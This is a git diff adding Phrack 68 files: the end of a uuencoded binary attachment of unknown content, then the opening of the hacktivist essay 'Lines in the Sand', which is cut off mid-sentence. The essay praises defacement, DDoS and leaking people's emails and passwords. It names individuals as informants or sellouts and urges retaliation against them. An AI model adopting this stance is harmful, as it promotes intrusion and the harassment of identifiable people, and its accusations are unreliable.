+M";T<OC+NGYQ-VLX%]RT5\W6$5\W516&B@L73/8MX^-9VXR8\0D+<1E<ZS<P;
+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
+!````
+`
+end
+
+
+--[ EOF
diff --git a/phrack68/16.txt b/phrack68/16.txt
new file mode 100644
index 0000000..53dbe12
--- /dev/null
+++ b/phrack68/16.txt
@@ -0,0 +1,490 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x44, Phile #0x10 of 0x13
+
+|=-----------------------------------------------------------------------=|
+|=----------------------=[ Lines in the Sand: ]=-------------------------=|
+|=-----------=[ Which Side Are You On in the Hacker Class War ]=---------=|
+|=-----------------------------------------------------------------------=|
+|=-------------------------=[ by Anonymous ]=----------------------------=|
+|=-----------------------------------------------------------------------=|
+
+                                   ---
+
+With dramatically growing hacker and leaker activity paralleling the
+revolutionary upheavals around the world, we are increasingly hearing the
+rhetoric of "cyberwar" thrown around by governments attempting to maintain
+legitimacy and exercise more police-state powers. In talking about the
+FBI's priorities ten years after 9/11, FBI director Robert Mueller stated
+in a recent speech at the International Association of Chiefs of
+Police(IACP) conference that "the next threat will be cyber-based ...
+self-radicalized individuals using online resources and individuals
+planning cyber attacks" [21]. Although hackers made a mockery of Mueller
+and the IACP during the conference by defacing their websites, it is hard
+to believe that hackers are a bigger threat than the "terrorists". Still,
+this logic is being used to send many more billions of dollars into white
+hat pockets at private military and intelligence contracted corporations to
+develop better defensive and offensive technology. The US is also proposing
+several changes to the 1986 Computer Fraud and Abuse Act, providing
+increased sentences (including mandantory minimums) as well as RICO Act
+classifications for computer hacking. For the most part, the increased
+hacker busts have largely targeted small-time defacers and DDoS kids
+allegedly affiliated with Anonymous - hardly the "foreign terrorist threat
+to critical infrastructure" used to justify the proposed increased
+penalties for hackers and increased cashflow to the security industry. But
+there's more than small timers at play: attacks against high profile
+institutions including law enforcement, military and corporate targets have
+escalated, becoming both more destructive as well as more politically
+articulate. We're experiencing the opening stages of the next Hacker Class
+War, and with many factions at play each operating with their own agenda
+and strategies, with more and more hackers breaking into shit for the rev
+or selling out to the military intelligence industrial complex, the
+question is asked "which side are you on"?
+
+U.S. military officials, eager to talk about how the Pentagon has boosted
+its computer defenses, often remain quiet when asked about its offensive
+Internet capabilities. A list of cyber capabilities-- available only to
+policymakers-- is described as ranging from planting a computer virus to
+bringing down electric grids [1]. This would not be possible if it were not
+for the assistance of computer hackers working directly or indirectly for
+the Department of Defense, as well as the tendency in our communities to
+support or tolerate those who choose to do so. Unfortunately, this
+mentality is frequently espoused by figureheads commonly quoted in
+mainstream news articles, where they claim to speak on behalf of the hacker
+community. Conversely, there has always been resentment from black hats and
+the criminally minded for the corporate sellouts who claim to be hackers
+but instead choose to protect systems against those who actually break into
+them. Much has been written about the corrupt white hats who work to
+protect vital infrastructure against other, more fun-loving hackers.  Many
+lulz have been had over the years every time these big shots get owned and
+all of their emails and passwords are released in nicely formatted .txt
+files.  Besides FBI collaborating fucks and security "professionals", it is
+time to call out the other emerging threat to the integrity of our scene:
+the US military's active effort to train and recruit hackers into aiding US
+cyber "defense" systems.
+
+With the passage of the 2012 Defense Authorization bill, the DoD has
+"express authority to conduct clandestine military activities in cyberspace
+in support of military operations". Reuters reports that "the Pentagon has
+put together a classified list of its offensive cyber capabilities so
+policymakers know their option". To what extent the US has already engaged
+in offensive electronic attacks is for the most part speculative. It is
+widely speculated that the US or Israeli military, or both cooperating,
+developed STUXNET to destroy Iran's nuclear facilities [2].
+
+To fill the need for skilled security people, the military operates several
+schools and training classes designed to turn young enlisted computer
+enthusiasts into skilled hackers. The US Military Academy in West Point, NY
+has an ACM SIGSAC chapter which teaches special classes on remote intrusion
+techniques and periodically hosts several live hacking competitions to
+"train and engage enlisted military, officer, or government-affiliated
+civilians". Last April, the West Point team was victorious over "veteran
+hackers from the NSA" at the 2011 Cyber Defense Exercise. Other military
+hacker teams such as ddtek (as led by Lt. Cmdr Chris Eagle who regularly
+speaks at DEFCON and Blackhat) also compete in civilian hacker tournaments
+such as DEFCON's CTF, usually dominating the competition by bringing dozens
+of Navy cybersecurity graduates [3][4]. No doubt many of these people will
+eventually be working at USCYBERCOM or other clandestine military hacker
+operations to launch attacks on behalf of the rich ruling class.
+
+The US government must not have too much faith in their enlisted hackers,
+because they collaborate with a variety of private companies and
+individuals to defend their networks as well as profiling, infiltrating and
+attacking their enemies. After LulzSec owned and leaked emails for the CEO
+of military-contracted security firm Unveillance and Infragard member Karim
+Hijazi, he was exposed to have been working with the DoD and the White
+House to not only profile "main hacking groups in Libya and their
+supporters" but also take the offensive and "map out Libya's Oil companies
+and their SCADA system's vulnerabilities" [5]. Even after Karim was owned
+and exposed he was willing to pay cash and offer his botnet to LulzSec to
+destroy his competitors, further revealing the white hat's corrupt and
+backstabbing nature as well as revealing how desperate and vulnerable the
+most powerful military in the world really is.
+
+Then there's Aaron Barr, the former CEO of HBGary Federal, who was served
+with swift and fierce justice-- being exposed for engaging in
+counter-intelligence operations attempting to disrupt both WikiLeaks (where
+he suggests "cyber attacks against the infrastructure to get data on
+document submitters") and Anonymous (where he cooperated with the FBI
+attempting to profile "key leaders") [6]. The leaked emails also reveal a
+bid to develop "persona management software" for the US military which is
+another COINTELPRO-type tool to spread propaganda by creating an army of
+fake twitter, facebook, blog, forum accounts to subvert democracy and
+manipulate public opinion. Although Barr/HBGary and
+Karim/Unveillance/Infragard have been exposed and humiliated, the
+implications of what has been released involving their work demonstrate a
+frightening and possibly illegal conspiracy between private security
+corporations collaborating with government and military to silence and
+disrupt their political opponents.
+
+Despite the obvious failures of their affiliates, the military continues to
+try to draw talent from independent hackers. DARPA made a public offering
+to hackerspaces in the US to do "research designed to help give the U.S.
+government tools needed to protect against cyberattacks". The program
+Cyber-Insider (CINDER) is headed by Peiter "Mudge" Zatko [7] who-- like
+many of us-- used to be a teenage hacker associated with the Cult of the
+Dead Cow and old-school hacker space l0pht. Peiter eventually "went
+straight" when they formed security consulting firm @Stake which was later
+acquired by Symantec. Now he's completed the vicious circle from teenage
+hacker to "security professional" to full blown military employment,
+serving as an example to aspiring hackers as what NOT to do. Mudge has now
+been speaking at hacker conferences like Schmoocon as well as various DARPA
+Industry Day events in an attempt to recruit more hackers into the DARPA
+fold. Hackerspaces, which are becoming a growing trend not only in the US
+but also internationally, are often strapped for cash to pay rent or
+purchase equipment, and because of unique problem-solving skills and a DIY
+hacker ethic are being looked at by employers in both private and
+government fields.  Unfortunately, many hackerspaces are "non-political"
+and are mostly composed of people more interested in a career than the
+hacker ethic, making many especially vulnerable to pressure to do research
+for the military or inform on other hackers to law enforcement.
+
+Hackerspaces aren't unique for being wishy-washy and apathetic in this
+regard: hackers in the US have a long history of big names going federal.
+Adrian Lamo, once known as the "homeless hacker" after turning himself in
+for breaking into several high profile news websites, is now universally
+hated as the dirty snitch who turned in alleged WikiLeaks leaker Bradley
+Manning. Despite this, Adrian still openly affiliates with 2600-- running
+their facebook group, making occasional appearances on IRC, and most
+recently being invited to speak on a panel at the 2010 HOPE convention.
+Then there's Kevin Mitnick-- whose social engineering skills somehow
+qualify him as some sort of spokesperson for hackers-- who has resigned
+himself (like so many others) to the "industry" doing professional security
+consulting and making big bucks giving speeches and signing books at
+conferences (and like so many others he has become a target of black hats
+who have repeatedly owned his servers and released his private emails and
+passwords) Jeff "The Dark Tangent" Moss, who for more than a decade headed
+the "largest underground hacking convention" DEFCON and the
+grossly-misnamed Black Hat Briefings ended up working for the Department of
+Homeland Security.  Then Oxblood Ruffin from the "underground" group Cult
+of the Dead Cow (which was also owned hard by black hats) runs his mouth on
+Twitter claiming "ownership" of the term "hacktivism" while repeatedly
+denouncing other hackers(specifically "black hats" and "anonymous") who
+break into and attack systems, going so far as to sign a joint statement by
+cDc, 2600, l0pht, CCC and others condemning Legion Of The Underground's
+attacks against the Iraqi government for human and civil rights abuses [8].
+
+Another more recent example of treachory in the hacker community is the
+case of 'security consultant' Thomas Ryan (aka frogman) who infiltrated and
+released internal mailing list communications for the NYC Occupy Wallstreet
+protesters.  For months he worked his way in, gaining access and trust,
+while at the same time forwarding protest plans to the FBI and several news
+organizations, eventually dumping everything to right-winger Andrew
+Breitbart's website as "proof" of "illegal anarchist activities". In the
+same files he released he accidentally included his own correspondence with
+the FBI and news organizations (some "security professional"). Thomas
+Ryan's white hat and right-wing leanings were rather well known in hacker
+circles, as well as his social engineering exploits (he previously spoke at
+the "black hat briefings" about his experiences tricking dozens of
+government employees and security cleared professionals by using a fake
+profile of an attractive and skilled woman named "Robin Sage":
+unfortunately he did not dump any private or embarassing information on his
+white hat brethren). Certainly the primary point of failure for OWS was
+poor security culture, trusting an already well-known reactionary white hat
+to their internal communications and protest details (a weakness of an
+open-source movement as opposed to closed private collectives composed of
+vouched-in members). However when this betrayal falls from our own hacker
+tree, we need to take responsibility and discourage future treachory (like
+how Aaron Barr was served by Anonymous).
+
+Then there's 2600 which is composed of several separate communities
+including the local meetups, the magazine, Off The Hook, and the IRC
+community. To be fair, Eric Corley is somewhat friendly to the interests of
+hackers, supporting digital rights, criticizing the police state, and being
+generally left-leaning.  But upon closer inspection you'll find a very
+disturbing militaristic anti-wikileaks, anti-EFF and straight up
+anti-hacker mentality held by many of the people involved: half the ops on
+2600net have no problem openly bragging about working for the military or
+collaborating with law enforcement. Just like ten years ago in their
+condemnation of LoU, 2600 released a statement in December condemning
+Anonymous ddos attacks against the banks and credit card corporations that
+were ripping off WikiLeaks [9] (a tactic that is nothing more than a
+digital version of a sit-in, a respected tradition of civil disobedience in
+US politics). Using the 2600 name to condemn Anonymous actions not only
+undermines our work but creates the false impression that the hacker
+community does not support actions against PayPal in support of Wikileaks.
+More than six months later, the FBI carried out raids at the homes of
+several dozen alleged Anonymous "members" who were purportedly involved
+with carrying out the LOIC attacks against PayPal. In light of how dozens
+of people (who may not even have been involved at all) may be facing
+decades in prison for some bogus trumped up federal conspiracy charges,
+what kind of credibility should be given to 2600 who clearly has no regard
+for practicing solidarity with hackers facing unjust persecution?
+
+The 2600net IRC network itself is run by a DoD-cleared, Infragard-trained
+"r0d3nt" named Andrew Strutt who works for a military-contracted company
+and has in the past openly admitted to working with law enforcement to bust
+people he claims were running botnets and distributing child porn. Andrew
